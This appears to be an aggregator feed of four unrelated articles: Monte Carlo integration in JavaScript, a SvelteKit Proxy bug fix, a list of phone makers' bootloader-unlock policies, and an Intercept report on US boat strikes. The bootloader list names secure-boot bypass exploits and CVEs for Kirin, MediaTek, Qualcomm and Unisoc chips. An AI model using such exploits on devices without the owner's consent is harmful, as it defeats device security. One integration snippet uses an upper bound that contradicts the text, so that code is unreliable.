For people who do not have experience with analysis, integration is counting the total size of very many, very small piles of things. Analytical integration, i.e. the process by which we can get an exact result, can be very difficult. It often takes knowledge of special tricks, strong pattern recognition, and plenty of trial and error. Fortunately, in all cases in my career when I’ve needed the value of an integral, an approximate answer has been good enough.

In practical terms, this means we could spend a lot of time learning integration tricks, practice using them, and then take half an hour out of our day to apply them to an integral in front of us … or, hear me out, or , we could write four lines of JavaScript that arrive at a relatively accurate answer in less than a second.

The approximating power of random numbers

If integration is summing many small piles, we have to figure out how big the piles are. Their height is usually given by a mathematical function, and our first example will be the same as in the Feynman trick article.

\[f(x) = \frac{x - 1}{\ln{x}}\]

This is to be integrated from zero to one, i.e. we want to know the size of the shaded area in the plot below. You can think of each column of shaded pixels as one pile, and we sum the size of all of them to get the total area. 1 Of course, this is an svg image so there are no columns of pixels. Alternatively, the more we zoom in, the thinner the columns become – but the more of them there are. This is why we need integration: it’s dealing with the limit case of infinitely many, infinitely thin columns.

feynman-vs-computer-01.svg

We could imagine drawing six random numbers between zero and one, and plotting piles of the corresponding height at those locations. Since there are six piles, their width is one sixth of the width of the area we are integrating.

feynman-vs-computer-02.svg

Even though some of these piles overlap by chance, and even though there are some random gaps between them, the sum of their areas (0.66) comes very close to the actual shaded area determined analytically (0.69). If we draw more piles, we have to make them correspondingly thinner, but the agreement between their sum and the total size of the area improves.

feynman-vs-computer-03.svg

These are 100× as many piles, and they’re 1/100th as thick to compensate. Their total area is 0.70 – very close to 0.69. If we draw even more piles, we’ll get even closer.

This illustrates a neat correspondence between integrals and expected values. In the simple case, we can frame it mathematically as

\[\int_a^b f(x) \mathrm{d}x = E(f(x))\]

In words, this says that integrating the function \(f\) between \(a\) and \(b\) is the same as taking the expected value of \(f(x)\) at uniformly distributed random points between \(a\) and \(b\).

Teaching the computer to do it

Here’s a JavaScript function that estimates the value of an integral in the most primitive way possible.

I = (B, lo, hi, f) => {
    // Generate B random values uniformly between lo and hi.
    let xs = Array.from({length: B}, _ => lo + (hi - lo) * Math.random());
    // Compute the value of f at each location.
    let ys = xs.map(f);
    // Return the total area of each corresponding pile.
    return (hi-lo)*ys.reduce((r, y) => r + y, 0)/ys.length;
}

To compute an approximation to the value of the integral we’ve seen, we run

I(10_000,
  0, 1,
  x => (x-1)/Math.log(x)
);

0.6916867623261724

This is fairly close to 0.69. And we got there in four lines of JavaScript, as promised.

Improved approximation through splittage

We can try this on the next example too. Now we’re asking about the integral

\[\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\]

which, translated to JavaScript, becomes

I(10_000,
  0, Math.PI,
  x => Math.log(1 - Math.sin(x))/Math.sin(x)
);

-3.67

This is again fairly close to the desired −3.7, but not quite there yet. The tricky shape of the function is the reason we aren’t getting as close as we want.

feynman-vs-computer-04.svg

At the upper endpoint of the integration interval, this function goes to negative infinity. The random piles we draw come primarily from the well behaved region of the function, and thus don’t help the computer realise this behaviour.

feynman-vs-computer-05.svg

There are clever ways to sample adaptively from the trickier parts of the function, but an easy solution is to just visually find a breakpoint, split the interval on that, and then estimate the sensible part separately from the crazy-looking part. Since the total area must be the sum of both areas, we can add their results together for a final estimation.

In this case, we might want to pick e.g. 1.5 as the breakpoint, so we combine the area estimations from 0–1.5 and then 1.5–\(\frac{\pi}{2}\). The result is

I(2_000, 0, 1.5, x => Math.log(1 - Math.sin(x))/Math.sin(x))
+ I(8_000, 1.5, Math.PI/2, x => Math.log(1 - Math.sin(x))/Math.sin(x));

-3.70

which is indeed much closer to the actual value of −3.7.

Note that we aren’t taking more samples, we’re just sprinkling them more wisely over the number line. We spend 2,000 samples in the relatively well-behaved region where the function takes values from −1 to −6, and then we spend the other 8,000 samples in the small region that goes from −6 to negative infinity. Here it is graphically:

feynman-vs-computer-06.svg

The reason this helps us is that this latter region contributes a lot to the value of the integral, but it is so small on the number line that we benefit from oversampling it compared to the other region. This is a form of sample unit engineering , which we have seen before in different contexts.

More evidence of sufficiency

We can continue with some more examples from the Feynman trick article. That gets us the following table.

Integral Value Estimation Difference Notes
\(\int_0^1 \frac{x-1}{\ln{x}} \mathrm{d}x\) \(\ln{2}\) 0.6943 0.2 %
\(\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\) \(\frac{-3 \pi^2}{8}\) -3.702 < 0.1 %
\(\int_0^1 \frac{\ln{(1 - x + x^2)}}{x - x^2} \mathrm{d}x\) \(\frac{-\pi^2}{9}\) -1.097 < 0.1 %
\(\int_0^{\frac{\pi}{2}} \frac{\arctan{(\sin{x})}}{\sin{x}} \mathrm{d}x\) \(\frac{\pi}{2}\log{(1 + \sqrt{2})}\) 1.385 < 0.1 %
\(\int_0^\infty x^2 e^{-\left(4x^2 + \frac{9}{x^2}\right)} \mathrm{d}x\) \(\frac{13 \sqrt{\pi}}{32 e^{12}}\) 0.000004414 0.2 % (1)
\(\int_0^1 \frac{\ln{x}}{1 - x^2} \mathrm{d}x\) \(\frac{-\pi^2}{8}\) -1.227 0.5 % (2)
\(\int_0^\infty \frac{e^{-x^2}}{1 + x^2} \mathrm{d}x\) \(\frac{\pi e}{2}\mathrm{erfc}(1)\) 0.6696 0.3 % (3)

Notes:

  1. The integration is from zero to infinity, but the function practically only has a value between zero and three, so that’s the region we estimate over.
  2. This is another case where the function goes to infinity near zero, so we split up the estimation into one for the range 0–0.1, and the other for 0.1–1.0. We have not increased the sample count, only reallocated the 10,000 samples.
  3. Again, the integration is from zero to infinity, but the function practically only has a value between zero and three, so that’s the region we estimate over.

Finding the error without a ground truth

“Now,” the clever reader says, “this is all well and good when we have the actual value to compare to so we know the size of the error. What will we do if we’re evluating a brand new integral? What is the size of the error then, huh?”

This is why we sampled the function randomly. That means our approximation is a statistical average over samples, and for that we can compute the standard error of the mean. In the JavaScript implementation below, we use the quick variance computation , but we could perhaps more intuitively have used the spc inspired method .

Ic = (B, lo, hi, f) => {
    let xs = Array.from(
      {length: B}, _ =>
      lo + (hi - lo) * Math.random()
    );
    let ys = xs.map(f);
    // Compute the variance of the ys from the sum and
    // the sum of squared ys.
    let s = ys.reduce((r, y) => r + y, 0);
    let ssq = ys.reduce((r, y) => r + y**2, 0);
    let v = (ssq - s**2/B)/(B-1);
    // Compute the mean and the standard error of the mean.
    let m = (hi-lo)*s/B;
    let se = (hi-lo)*Math.sqrt(v/B);
    // Compute the 90 % confidence interval of the value of
    // the integral.
    return {
        p05: m - 1.645*se,
        p95: m + 1.645*se,
    }
}

If we run this with the first integral as an example, we’ll learn that

Ic(10_000,
  0, 1,
  x => (x-1)/Math.log(x)
)

Object {
  p05: 0.6896
  p95: 0.6963
}

Not only is this range an illustration of the approximation error (small!), it is also very likely to capture the actual value of the integral. Here are some more examples from the same integrals as above:

5 % 95 % Actual Contained?
0.6904 0.6972 0.6931
-3.7673 -3.6787 -3.7011
-1.0975 -1.0960 -1.0966
1.3832 1.3871 1.3845
0.4372 0.4651 0.4424
-1.2545 -1.2254 -1.2337
0.6619 0.6937 0.6716

These are all built naïvely from 10,000 uniform samples. In other words, in none of the cases have the computation been split up to allocate samples more cleverly.

Again, we could spend a lot of time learning to integrate by hand … or we ask the computer for less than a second of its time first, and see if the accuracy it can do it with is appropriate for our use case. In my experience, it generally is.

Seeing the effect of sample unit engineering

What’s neat is we can still split up the computation like we did before, if we believe it will make the error smaller and the confidence interval narrower. Let’s use the following integral as an example.

\[\int_0^\infty \frac{\sin{x}}{x} \mathrm{d}x\]

This oscillates up and down quite a bit for small \(x\), and then decays but still provides significant contributions for larger \(x\). A naive evaluation would have a confidence interval of

Ic(10_000, 0, 100, x => Math.sin(x)/x)

Object {
  p05: 1.461
  p95: 1.884
}

and while this is certainly correct 2 The actual value of the integral is half \(\pi\) or approximatey 1.571. , we can do better. We’ll estimate the region of 0–6 separately from 6–100, using half the samples for each 3 Why put the break point at 6? The period of sin is a full turn, which is roughly 6 radians. This ensures we get roughly symmetric contributions from both integrals. That’s not necessary for the technique to work, but it makes the illustration a little cleaner. :

Ic(5_000, 0, 6, x => Math.sin(x)/x)

Object {
  p05: 1.236
  p95: 1.468
}

This contains the bulk of the value of the integral, it seems. Let’s see what remains in the rest of it.

Ic(5_000, 6, 100, x => Math.sin(x)/x)

Object {
  p05: 0.080
  p95: 0.198
}

We can work backwards to what the standard errors must have been to produce these confidence intervals. 4 The midpoint is the point estimation for each region, and the standard error is 1/1.645 times the distance between the 5 % point and the midpoint.

Region Value Standard error
0–6 1.4067 0.0372
6–100 0.1390 0.0359

The estimation of the total area would be the values summed, i.e. 1.5457. The estimation of the standard error of this we get through Pythagorean addition and it is approximately 0.05143. We convert it back to a confidence interval and compare with when we did not break it up into multiple components.

Method 5 % 95 % Range
Single operation (10,000 samples) 1.461 1.884 0.423
Two operations (5,000 samples × 2) 1.461 1.630 0.169

Although in this case the two methods happen to share a lower bound, the upper bound has been dramatically reduced. The total range of the confidence interval is more than halved! This was because we allocated the samples more cleverly – concentrated them in the early parts of the function – rather than increased the number of samples.

That said, we’re at a computer, so we could try increasing the sample count. Or maybe both?

Method 5 % 95 % Range
Single operation (10,000 samples) 1.461 1.884 0.423
Two operations (5,000 samples × 2) 1.461 1.630 0.169
Single operation (100,000 samples) 1.549 1.680 0.131
Two operations (50,000 samples × 2) 1.524 1.578 0.054

It seems like sampling more cleverly has almost the same effect as taking ten times as many samples.

We could play around with where to put the breakpoint, and how many samples to allocate to each side of it, and see which combination yields the lowest error. Then we can run that combination with a lot of samples to get the most accurate final result. That would take maybe 15 minutes of tooting about and exploring sensible-seeming alternatives, so it’s probably still quicker than integrating by hand.

When the computer is not enough

It should be said that there are times when numeric solutions aren’t great. I hear that in electronics and quantum dynamics, there are sometimes integrals whose value is not a number, but a function, and knowing that function is important in order to know how the thing it’s modeling behaves in interactions with other things.

Those are not my domains, though. And when that’s not the case, the computer beats Feynman any day of the week.

Hunting a production-only proxy bug in SvelteKit

Lobsters
drew.silcock.dev
2025-12-04 15:58:18
Comments...
Original Article

I came across a pretty gnarly/fun bug in my Svelte project recently that had me scratching my head for a while and turned out to be a bug in SvelteKit itself, so I thought I’d write up the process I went through in finding, debugging, and fixing it.

Hopefully, someone will find this useful if they come across a similar issue (this includes me in 3 months time when I’ve forgotten all about this).

There didn’t seem to be a lot around it when I was frantically Googling it during the early phases of “why is this happening to me???”, anyway.

So what’s the issue?

I’ve got a medium-sized SvelteKit app that I’ve been working on-and-off for a few years now (maybe 50k SLOC across a few hundred files) and I recently (finally) took the plunge to update it from Svelte 4 to Svelte 5. It was a pretty painful few days, but at the end of it, I had my app working locally with runes enabled on every single page and component.

There was just one issue – when I pushed my code up to the staging server, it didn’t work :-(

And when I say “didn’t work”, I mean not a single page would load. Not even the main layout would load.

Works on my machine

It’s basically impossible to debug an issue in production or even on a staging server, so the first thing was to figure out why, given this issue was 100% reproducible and unavoidable by visiting any page on the staging server, I wasn’t seeing anything wrong when running it locally.

So what’s the difference between how this is running locally and in prod/staging? Who are the main suspects in this murder mystery where my staging server is the tragic victim?

Well, the main thing is that when I run it locally, I use pnpm dev whereas in prod, I use the Node Adapter running inside Docker. This narrows it down somewhat – here are the main suspects:

  • The Docker environment is Linux and I’m developing on macOS.
  • I use Sentry in prod/staging but have it disabled locally – it could be doing something naughty? I updated all my dependencies including Sentry integration during the Svelte upgrade so this bump could’ve introduced an issue.
  • The Node Adapter environment is different from the vite dev environment.
  • It could be an issue with the staging infra (REST API, DB, etc.) which is cascading down to the frontend, or the issue could only be present in error handling code which is only triggered by an issue w/ the staging infra.

Geolocating the bug

The staging server gives me no information in the interface/browser console, but if I dig through the container logs I can see a single error message:

Unable to retrieve user dashboard: TypeError: Cannot read private member #state from an object whose class did not declare it

at Proxy.clone (node:internal/deps/undici/undici:10027:31)

at UsersApi.fetchApi (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:170:30)

at process.processTicksAndRejections (node:internal/process/task_queues:103:5)

at async UsersApi.request (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:90:22)

at async UsersApi.getCurrentUserDashboardRaw (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:110:22)

at async UsersApi.getCurrentUserDashboard (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:126:22)

at async load (file:///app/build/server/chunks/12-CIrAv-H7.js:16:23)

at async fn (file:///app/build/server/index.js:3022:14)

at async load_data (file:///app/build/server/index.js:3013:18)

at async file:///app/build/server/index.js:4639:18

Ahah, our first clue! 🔎

Okay, so it looks like the frontend is trying to hit the REST API to get user information to load the main dashboard, and it’s hitting an error inside some internal node dependency called “undici” 🤔

This is a bit weird – my code is the next stack up, in UsersApi.fetchApi – this code is auto-generated using OpenAPI Generator’s typescript-fetch generator , meaning it has been auto-generated from the OpenAPI specification of my REST API. That hasn’t changed in the recent upgrade, so it must be one of the dependencies that I updated…

This is all a bit weird as the actual error is happening inside an internal node dependency, undici . I haven’t bumped my Node version itself so this clue confuses me greatly.

Let’s check out my code that’s creating the error. The stack trace is from a prod build so it’s giving me a line number form the built chunk, but that’s fine. Here’s the code:

163

...

164

for (const middleware of this.middleware) {

165

if (middleware.post) {

166

response = await middleware.post({

167

fetch: this.fetchApi,

168

url: fetchParams.url,

169

init: fetchParams.init,

170

response: response.clone()

171

}) || response;

172

}

173

}

174

...

The Cloning Theorem

Okay, so response.clone() is where the error is happening. The response object is an instance of Response coming from fetch() which is what the undici library provides, but the stack trace doesn’t say Response.clone() , it says Proxy.clone() … Another mystery 🤔

But what does the actual error mean? Apparently I have been living under a TypeScript rock for the last few years, because I don’t think I’ve ever actually seen anyone using #my-element in JavaScript before, even though it’s been deployed to V8 since 2019 .

Anyway, if you have a class in JavaScript with an element ( MDN says not to call them properties because property implies some attributes which these private elements don’t have but you can mentally replace “element” with “field or method”) whose name starts with # the JavaScript runtime enforces that this element cannot be accessed from outside the class – they are private.

This kind of makes sense – the stack trace says Proxy.clone() , not Response.clone() , but it is the undici Response class that defines the private #state field. You can see the code for yourself on nodejs/undici . The Proxy class isn’t allowed to see Response class’s privates – they just don’t have that kind of relationship.

So now the question is: who’s doing the proxying???

It’s always lupus Sentry

Like Dr. House barely 10 minutes into the episode 1 , I was convinced that Sentry was the culprit – I had updated the library and the update was doing something stupid. As an error handling/tracing library, it must be proxying the response so that it can determine whether it is an error response to report back to the Sentry server.

It’s perfect – it fits all the symptoms and explains why I’m not seeing the issue locally (I disable Sentry in local dev environment). 2

As such, I prescribed an immediate Sentry-ectomy, removing all the Sentry code whatsoever and pushing the update up to staging, confident that my clinical intervention would immediately resolve the issue and reveal the culprit as Sentry.

The result? Still broke. The patient was still dying. The murderer remained at large. The dominoes of my Sentry theory had fallen like a house of cards – checkmate.

It must be something about Docker or Node Adapter then

At this point I thought that it must be something to do with running inside Docker or using the Node Adapter, so I:

  • Ran pnpm build and node --env-file=.env build – no issue.
  • Ran docker build -t my-app . and docker run --network=host --rm --env-file=.env my-app – no issue.

This was getting weird now.

Death by Proxy

At this point, we need more clues. This is probably the bit of the episode where Dr. House intentionally makes the patient worse to try to figure out what the underlying issue is.

Luckily, we have a more precise surgical tool to figure out who is using Proxy , and the answer is… Proxy .

What exactly does Proxy do? Well, if you want to attach additional functionality to a pre-existing class or function, you can wrap it in a proxy and insert your own code into the process. This is especially useful for things like tracing, which is why I (unfairly) blamed Sentry earlier.

Here’s an example:

1

const originalLog = console.log;

2

console.log = new Proxy(originalLog, {

3

apply(target, thisArg, args) {

4

const convertedArgs = args.map(arg => {

5

if (typeof arg === 'string') {

6

return arg

7

.split('')

8

.map((char, i) => (i % 2 === 0 ? char.toLowerCase() : char.toUpperCase()))

9

.join('');

10

}

11

return arg;

12

});

13

14

return Reflect.apply(target, thisArg, convertedArgs);

15

}

16

});

So what does this strange-looking code do? Let’s try it out:

» console.log("The quick brown fox jumps over the lazy dog")

← tHe qUiCk bRoWn fOx jUmPs oVeR ThE LaZy dOg

Now you can successfully make everything that logs to your console sound ✨ sardonic and disingenuous ✨ I call it spongelog (trademark pending).

For those lucky of you who haven’t come across Reflect and/or apply yet, invoking a function like myClass.doSomethingNow(arg1, arg2) is the same as doing myClass.doSomethingNow.apply(myClass, [arg1, arg2]) which is also the same as doing myClass.call(myClass, arg1, arg2) which is the same as Reflect.apply(myClass.doSomethingNow, myClass, [arg1, arg2]) … Yeah, this is what JavaScript is like. Keep adding newer, more “modern” ways of doing the same things without ever removing the old ways.

So how can we proxy-ception our response to find our culprit?

1

const OriginalProxy = Proxy;

2

globalThis.Proxy = new Proxy(OriginalProxy, {

3

construct(target, args, newTarget) {

4

// We can proxying the creation of a proxy, so the first arg to the

5

// constructor is the object we're proxying. We only care about code

6

// that's proxying the response.

7

const proxiedClass = args[0].constructor.name;

8

if (proxiedClass === "Response") {

9

console.trace("Creating response Proxy");

10

}

11

return Reflect.construct(target, args, newTarget);

12

},

13

});

This time we are intercepting the constructor of the Proxy class so that we can find what piece of code is doing new Proxy(response, ...) . When you do new Proxy() , the first argument is the thing we’re proxying, so we want to find who is doing new Proxy() on something whose first argument is an instance of class Response from undici – we can do this by getting the name of the constructor which is the same as the name of the class. (It’s possible that there’s another class called Response elsewhere in the code, but unlikely.)

Don’t be silly and accidentally put this code somewhere where it runs on every request, or you’ll end up with exponential explosion of console.trace calls as each new proxy triggers the other proxies and adds another trace to the pile, like the logging equivalent of a nuclear bomb… Not that I did that or anything, that would be stupid haha…

And the culprit is…

Here’s the single trace that showed:

Trace: Creating response Proxy

at Object.construct (.../src/hooks.server.ts:20:17)

at universal_fetch (.../node_modules/.pnpm/@[email protected]_@[email protected]_@[email protected]_svelte_1a81703e589b392db9a0fd6d8f25cd68/node_modules/@sveltejs/kit/src/runtime/server/page/load_data.js:331:17)

at process.processTicksAndRejections (node:internal/process/task_queues:105:5)

The first frame at hooks.server.ts is just where my code that is creating my proxy-ception is running so we can ignore that. The culprit is @sveltejs/kit/src/runtime/server/page/load_data.js .

Here’s an abbreviation of what the code is doing:

1

const proxy = new Proxy(response, {

2

get(response, key, _receiver) {

3

// Lots of SvelteKit-specific functionality which isn't relevant for us

4

// ...

5

6

return Reflect.get(response, key, response);

7

}

8

});

What’s this all about then?

So what’s the issue with this? Well, prior to my raising a bug in the SvelteKit repo, there was precisely one mention of this specific bug: nodejs/undici#4290 which explains that when you proxy an object that has methods, doing obj[key] or Reflect.get(obj, key, obj) will get the method from the object 3 but it will not bind the resulting method to obj . Normally, this doesn’t matter, but when you’re proxying an object, the this will be bound not to the object but to the proxy instance itself.

This explains why the stack trace was showing Proxy.clone() instead of Response.clone() because when clone() was running, this was an instance of Proxy , not an instance of Response .

Hi, I’m the problem, it’s me

You might be wondering why this issue only occurred in prod/staging and not locally. The answer is that I was being stupid 4 .

I was convinced that the reason this was happening was because of this big Svelte upgrade that I just did, but the truth is that it’s completely unrelated and this just happened to be the first update I’d made to the app since node:lts Docker image changed from Node v22 to Node v24 in October 2025.

In the CI pipeline, it was Node v24 that was being pulled instead of v22 – the #state private field was introduced in v24 so that is why the issue was not showing before.

As to why it wasn’t showing when I run it locally using Docker – my Docker was using a cache node:lts image which was the old v22 one. 🤦🏻‍♂️

It’s version managers all the way down

I tried verifying this by doing fnm use 24 followed by pnpm dev , but the bug was still mysteriously missing.

It is at this point that I found out that pnpm has its own node version manager built-in, which you can change using pnpm use --global 24 . If you want to be sure, you can do pnpm exec node --version to tell you.

So not only can pnpm manage its own version using the packageManager field in package.json , it can also manage the node version. What a crazy world we live in.

Applying the fix

With the pnpm-managed node version set to 24, sure enough the issue was present locally. Applying the quick fix recommended in the undici GitHub issue as a manual patch to the library files in node_modules fixed the issue:

1

const proxy = new Proxy(response, {

2

get(response, key, _receiver) {

3

get(response, key, receiver) {

4

// Lots of SvelteKit-specific functionality which isn't relevant for us

5

// ...

6

7

return Reflect.get(response, key, response);

8

const value = Reflect.get(response, key, response);

9

10

if (value instanceof Function) {

11

// On Node v24+, the Response object has a private element #state – we

12

// need to bind this function to the response in order to allow it to

13

// access this private element. Defining the name and length ensure it

14

// is identical to the original function when introspected.

15

return Object.defineProperties(

16

/**

17

* @this {any}

18

*/

19

function () {

20

return Reflect.apply(value, this === receiver ? response : this, arguments);

21

},

22

{

23

name: { value: value.name },

24

length: { value: value.length }

25

}

26

);

27

}

28

29

return value;

30

}

31

});

Okay, but what’s up with the Object.defineProperties() nonsense?

This is probably not needed, but the recommended fix from MDN returns a bound method that is slightly different from the original. You can see this by comparing the 2 different methods:

1

class Person {

2

#hunger = "hungry";

3

4

status(name, email) {

5

return `I am ${name} <${email}> and I am ${this.#hunger}`;

6

}

7

};

8

9

const me = new Person();

10

11

brokenProxy = new Proxy(me, {

12

get(target, prop, receiver) {

13

return Reflect.get(target, prop, receiver);

14

}

15

})

16

17

plainProxy = new Proxy(me, {

18

get(target, prop, receiver) {

19

const value = Reflect.get(target, prop, receiver);

20

21

if (value instanceof Function) {

22

return function (...args) {

23

return value.apply(target, args);

24

}

25

}

26

27

return value;

28

}

29

});

30

31

fancyProxy = new Proxy(me, {

32

get(target, prop, receiver) {

33

const value = Reflect.get(target, prop, receiver);

34

35

if (value instanceof Function) {

36

// On Node v24+, the Response object has a private element #state – we

37

// need to bind this function to the response in order to allow it to

38

// access this private element. Defining the name and length ensure it

39

// is identical to the original function when introspected.

40

return Object.defineProperties(

41

function () {

42

return Reflect.apply(value, this === receiver ? target : this, arguments);

43

},

44

{

45

name: { value: value.name },

46

length: { value: value.length }

47

}

48

);

49

}

50

51

return value;

52

}

53

});

Here are the differences:

» brokenProxy.status("Drew", "[email protected]")

⚠︎ brokenProxy.status()

Uncaught TypeError: can't access private field or method: object is not the right class

status debugger eval code:5

<anonymous> debugger eval code:1

» plainProxy.status("Drew", "[email protected]")

← "I am Drew <[email protected]> and I am hungry"

» plainProxy.status.name

← ""

» plainProxy.status.length

← 0

» fancyProxy.status("Drew", "[email protected]")

← "I am Drew <[email protected]> and I am hungry"

» fancyProxy.status.name

← "status"

» fancyProxy.status.length

← 2

As expected, the original proxy is broken as this is not bound and so the privacy of the Person.#hunger field is violated. Both the plain and fancy proxies work when invoked, when you look at their name and length (the latter being the number of arguments), they are different.

Some JavaScript code will introspect a method to see what the name and length are for various (somewhat hacky) reasons. (There’s a lot of bad JavaScript code out there, trust me – I only wrote some of it.) This is probably pretty unlikely, but if you thought this was a bad bug to find, just think about how nasty it would be to track down some stray code that was introspecting the name and/or length of some random method on response and making faulty assumptions based on the incorrect values presented by the proxied method 🤢

Fixed 🎉

I created a PR with this fix whereupon it was quickly merged and within 4 days it was bundled into the next SvelteKit release – this project is really actively maintained.

I was quite surprised that this wasn’t picked up by anyone else – after all, any call to response.clone() where the response comes from SvelteKit’s fetch() inside a page load handler would trigger this bug as long as you’re on Node v24+. I guess cloning responses isn’t a very common thing to do? 🤷🏻

Regardless, the murderer is serving hard time, the patient is recovering, and I can go touch some grass and not think about JavaScript for a while.

Further Reading

  1. If House was so clever, he would know that his first guess isn’t right because it’s only 10 minutes into the episode but hey, I’m not the one with the medical degree.

  2. I am mixing the metaphors a little here – first it’s a murder, now it’s a diagnostic mystery – just stick with it.

  3. If you’re wondering what the difference is between obj[key] and Reflect.get(obj, key, obj) , it only makes a difference when key has a getter defined on obj which means that doing obj[key] actually invokes the getter method – Reflect.get() ensures that this is correctly bound to obj when the getter is invoked.

  4. To be fair, this is generally a decent bet.

Bootloader Unlock Wall of Shame

Hacker News
github.com
2025-12-04 15:57:21
Comments...
Original Article

Banner. A lock and a key on fire on the left and the text 'Bootloader Unlock: Wall of Shame' on the right.

Keeping track of companies that "care about your data 🥺"

Switch to Russian translation

Terrible License CC BY-NC-SA

mirrors

Why?

Over the past few years, a suspicious number of companies have started to "take care of your data", aka block/strictly limit your ability to unlock the bootloader on your own devices.

While this may not affect you directly, it sets a bad precedent. You never know what will get the axe next: Shizuku? ADB?

They've already gone after sideloading .

I thought it might be a good idea to keep track of bad companies and workarounds.

If you know of specific details/unlocking methods, please PR them or drop them in the discussions

The list:

Caution

Reminder that no matter how nice a company is,
you should not trust them unless their unlock process is 100% offline!

🍅 Just terrible!

The following manufacturers have made it completely impossible to unlock their devices without a workaround.

Alcatel

Amazon

Apple

Asus

Cat

Coolpad

Doogee

Energizer

Huawei

Meizu

Panasonic

Samsung

Sharp

TCL/BlackBerry

Vivo/IQOO

Windows phones

Carrier Locked Devices

Note

Phone brands handle carrier locks differently, so check your device manual or contact support.

Carrier locked devices are the ones you get after making a commitment with a carrier of your choice. This is quite common in North America and (supposedly) allows you to save some money on your device.

As a rule, almost all carrier locked devices do not allow the bootloader to be unlocked. This usually makes sense, as it would allow you to completely bypass the contract. The problem is that many devices still do not allow you to unlock the bootloader even after the carrier lock has been lifted. For more details, see the carriers page .

⛔ Avoid at all costs!

The following manufacturers allow unlocking under certain conditions, such as region, model, SOC, etc., or require a sacrifice to unlock.

Hisense

HMD/Nokia

Honor

HTC

LG

Motorola/Lenovo/NEC

OPPO/Realme

Xiaomi/Redmi/POCO

ZTE/nubia

⚠️ Proceed with caution!

The following manufacturers require an online account and/or a waiting period before unlocking.

Fairphone

Google/Nexus

Infinix

itel

OnePlus

Sony

Tecno

ℹ️ "Safe for now" :trollface:

Blackview

Cubot

Micromax

Microsoft

Nothing

Oukitel

Shift

Teclast

Teracube

Ulefone

Umidigi

Volla

TP-Link/Neffos

Misc info

Custom AVB Keys

Custom Android Verified Boot keys is a feature which allows you to run a custom OS with a locked bootloader.

It's rare to see a device which supports custom AVB keys, but some devices can be found here .

Universal SOC-based methods

Kirin

Kirin 620, 650, 655, 658, 659, 925, 935, 950, 960:
It's possible to unlock using testpoints and PotatoNV (Read the readme)

MediaTek

If you own a MediaTek device exploitable by mtkclient you can unlock the bootloader using that.
If it also happens to be an OPPO/Realme device and you need to access fastboot: lkpatcher ( web version )

Qualcomm

There's no Universal Qualcomm method, unfortunately.

Although some of these might work for you:

The general exploit:
alephsecurity.com the bootloader unlock section.

Xiaomi Mi A1 and maybe all MSM89** manufactured before 2018:
EDLUnlock

Unisoc

If you own a phone with the Unisoc UMS9620 or older,you can use this exploit to achieve temporary secure boot bypass and persistently unlock bootloader(except some devices with modified uboot) CVE-2022-38694_unlock_bootloader

If you own a phone with the Unisoc UMS312 UMS512 UD710,you can use this exploit to achieve persistently secure boot bypass, which means all firmwares including splloader,uboot can be modified and resigned. CVE-2022-38691_38692

Otherwise, you can also look into this: Spectrum_UnlockBL_Tool
This: xdaforums.com
Or this: subut


Pentagon Claims It “Absolutely” Knows Who It Killed in Boat Strikes. Prove It, Lawmaker Says.

Intercept
theintercept.com
2025-12-04 15:41:51
Rep. Chrissy Houlahan said, “If there is intelligence to 'absolutely confirm' this, the Congress is ready to receive it.” The post Pentagon Claims It “Absolutely” Knows Who It Killed in Boat Strikes. Prove It, Lawmaker Says. appeared first on The Intercept....
Original Article

After Pentagon Press Secretary Kingsley Wilson declared the War Department was certain about the identities of supposed drug smugglers killed in boat strikes, Rep. Chrissy Houlahan, D-Pa., had some questions about the intelligence. When Houlahan called on Wilson to appear before Congress, however, the outspoken and controversial spokesperson suddenly went silent.

“I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Wilson said on Tuesday during a pseudo Pentagon press briefing where attendance was limited to media that have agreed to limits on the scope of their reporting.

“[O]ur intelligence absolutely confirms who these people are,” she said. “I can tell you that, without a shadow of a doubt, every single one of our military and civilian lawyers knows that these individuals are narcoterrorists.”

In exclusive comments to The Intercept, Houlahan expressed her doubts and demanded proof.

“If there is intelligence that ‘absolutely confirms’ this — present it. Come before the House or Senate Intelligence committees and let Congress provide the proper oversight and checks and balances the American people deserve,” said Houlahan, who serves on the House Armed Services Committee and the House Permanent Select Committee on Intelligence. “Put the whispers and doubts to rest once and for all. If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it. Until we all see it, you can surely understand why we are skeptical.”

Both the House Armed Services Committee and the House Permanent Select Committee on Intelligence, both of which Houlahan serves on, routinely receive classified briefings from the military.

Wilson – who touted a “new era” of working to “keep the American people informed and to ensure transparency” on Tuesday – did not respond to questions or requests for comment from The Intercept about Houlahan’s remarks or appearing before Congress.

In past classified briefings to lawmakers and Congressional staff, the military has admitted that it does not know exactly who it’s killing in the boat strikes, according to seven government officials who have spoken with The Intercept.

Rep. Sara Jacobs, D-Calif., also a member of the House Armed Services Committee, said that Pentagon officials who briefed her admitted that the administration does not know the identities of all the individuals who were killed in the strikes.

“They said that they do not need to positively identify individuals on the vessels to do the strikes,” Jacobs told The Intercept in October . “They just need to show a connection to a DTO or affiliate,” she added, using shorthand for “ designated terrorist organizations ,” the Trump administration’s term for the secret list of groups with whom it claims to be at war.

Twenty-One Attacks

The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September and killing at least 83 civilians . It has not conducted a strike on a vessel since November 15.

Since the strikes began, experts in the laws of war and members of Congress from both parties say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.

The summary executions mark a major departure from typical practice in the long-running U.S. war on drugs , where law enforcement agencies arrest suspected drug smugglers.

A double-tap strike during the initial September 2 attack — where the U.S. hit an incapacitated boat for a second time, killing two survivors clinging to the wreckage — added a second layer of illegality to strikes that experts and lawmakers say are already tantamount to murder . The double-tap strike was first reported by The Intercept .

War Secretary Pete Hegseth has been under increasing fire for that strike . The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”

Hegseth acknowledged U.S. forces conducted a follow-up strike on the alleged drug boat during a Cabinet meeting at the White House on Tuesday but distanced himself from the killing of people struggling to stay afloat.

